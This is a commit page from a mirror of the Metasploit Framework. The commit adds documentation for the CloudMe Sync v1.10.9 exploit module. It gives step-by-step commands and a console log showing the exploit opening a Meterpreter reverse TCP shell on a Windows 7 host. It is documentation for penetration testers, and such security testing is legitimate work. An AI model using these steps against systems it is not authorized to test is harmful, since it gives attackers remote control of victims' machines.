infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

CloudMe Sync Client documentation

MS-2855/keylogger-mettle-extension
Daniel Teixeira 2018-02-20 21:56:31 +00:00 committed by GitHub
parent 651ddbb7eb
commit ff3b318abd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 66 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

66
documentation/modules/exploit/windows/misc/cloudme_sync.md Normal file
View File

@ -0,0 +1,66 @@
## Verification Steps
1. Install CloudMe for Desktop version `v1.10.9`
2. Create a free account and start the applicaton
6. Start `msfconsole`
4. Do `use exploit/windows/misc/cloudme_sync`
5. Do `set RHOST ip`
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
12. Do `set LHOST ip`
13. Do `exploit`
14. Verify the Meterpreter session is opened
## Scenarios
### CloudMe Sync client application on Windows 7 SP1
```
msf > use exploit/windows/misc/cloudme_sync
msf exploit(windows/misc/cloudme_sync) > show options
Module options (exploit/windows/misc/cloudme_sync):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.40.148 yes The target address
RPORT 8888 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.40.5 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 CloudMe Sync v1.10.9
msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
RHOST => 172.16.40.148
msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(windows/misc/cloudme_sync) > exploit
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Sending stage (179779 bytes) to 172.16.40.148
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
meterpreter > sysinfo
Computer : PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```